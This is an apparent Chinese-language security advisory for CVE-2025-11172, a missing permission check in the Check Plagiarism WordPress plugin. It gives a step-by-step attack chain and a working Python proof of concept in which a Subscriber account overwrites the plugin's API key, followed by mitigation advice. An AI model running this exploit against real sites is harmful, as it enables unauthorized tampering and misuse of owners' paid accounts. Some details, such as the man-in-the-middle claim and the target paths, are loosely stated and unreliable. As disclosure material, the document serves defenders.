CVE-2025-11172 WordPress Check Plagiarism插件权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11172

漏洞类型

授权绕过/缺少权限检查

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Check Plagiarism WordPress Plugin

漏洞概述

CVE-2025-11172是WordPress平台Check Plagiarism插件的一个中危授权绕过漏洞。该漏洞存在于插件的chk_plag_mine_plugin_wpse10500_admin_action()函数中，由于缺少适当的权限检查（capability check），导致低权限用户（如Subscriber角色）能够执行原本需要管理员权限的操作。具体而言，攻击者可以未经授权修改插件的API密钥设置。Check Plagiarism是一款用于检测文本抄袭的WordPress插件，广泛应用于教育机构和内容管理平台。此漏洞影响插件所有版本直至2.0版本，CVSS评分4.3，属于中危级别。虽然漏洞不会直接导致代码执行或数据泄露，但攻击者通过修改API密钥可能影响插件的正常功能，或利用他人付费API账户，造成经济损失。

技术细节

该漏洞的根本原因在于WordPress插件的admin action函数缺少current_user_can()权限验证。攻击者利用WordPress的认证机制，只需拥有Subscriber级别账号即可向/admin.php或wp-admin/admin-post.php发送恶意请求。攻击流程：首先攻击者登录WordPress获取有效会话cookie，然后构造包含新API密钥的POST请求，目标是chk_plag_mine_plugin_wpse10500_admin_action()函数。由于该函数未验证用户权限，任何认证用户都能触发此操作，将插件API密钥替换为攻击者控制的密钥。一旦API密钥被篡改，插件的查重功能将使用攻击者指定的密钥，可能导致服务中断或产生未授权费用。漏洞代码位于插件主文件index.php约第760行附近，缺少current_user_can('manage_options')检查。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用WordPress CMS，并通过插件目录或WPScan等工具确认安装了Check Plagiarism插件且版本<=2.0

STEP 2

步骤2：获取低权限账号

攻击者注册WordPress账号获得Subscriber角色，或利用已有低权限账号登录系统

STEP 3

步骤3：构造恶意请求

攻击者构造包含action参数和恶意API密钥的POST请求，目标是/admin.php或admin-post.php，action值为chk_plag_mine_plugin_wpse10500_admin_action

STEP 4

步骤4：触发漏洞

发送构造的请求，由于函数缺少current_user_can()检查，WordPress允许认证用户执行该操作

STEP 5

步骤5：API密钥篡改成功

插件数据库中的API密钥被替换为攻击者指定的值，攻击者获得插件服务控制权

STEP 6

步骤6：后续攻击利用

攻击者可通过控制API密钥造成服务中断、消耗他人API配额、或进行中间人攻击截获查重数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11172 PoC - Unauthorized API Key Modification
# Affected: Check Plagiarism WordPress Plugin <= 2.0

target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress.com'
username = 'subscriber_user'
password = 'user_password'
malicious_api_key = 'attacker_controlled_key_12345'

# Step 1: Authenticate and get nonce/cookies
session = requests.Session()
login_url = f'{target_url}/wp-login.php'
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In'
}

response = session.post(login_url, data=login_data)
if 'wordpress_logged_in' not in session.cookies:
    print('[-] Authentication failed')
    exit(1)

print('[+] Authentication successful')

# Step 2: Exploit the vulnerability - modify API key
# The vulnerable function: chk_plag_mine_plugin_wpse10500_admin_action()
# No capability check on current_user_can()
exploit_url = f'{target_url}/wp-admin/admin-post.php'
exploit_data = {
    'action': 'chk_plag_mine_plugin_wpse10500_admin_action',
    'api_key': malicious_api_key,
    'chk_plag_api_key': malicious_api_key
}

response = session.post(exploit_url, data=exploit_data)

if response.status_code == 200:
    print('[+] API key modification request sent')
    print(f'[+] Malicious API key: {malicious_api_key}')
    print('[!] Plugin API key has been compromised')
else:
    print('[-] Exploitation may have failed')

影响范围

Check Plagiarism WordPress Plugin <= 2.0 (所有版本)

防御指南

临时缓解措施

立即将Check Plagiarism插件升级到开发者发布的安全版本（>2.0）。如果无法立即升级，可临时采取以下措施：1) 限制WordPress用户注册功能；2) 审查所有Subscriber及以上级别用户账号；3) 使用WordPress安全插件如Wordfence监控异常管理员操作；4) 考虑暂时禁用Check Plagiarism插件直至完成安全更新。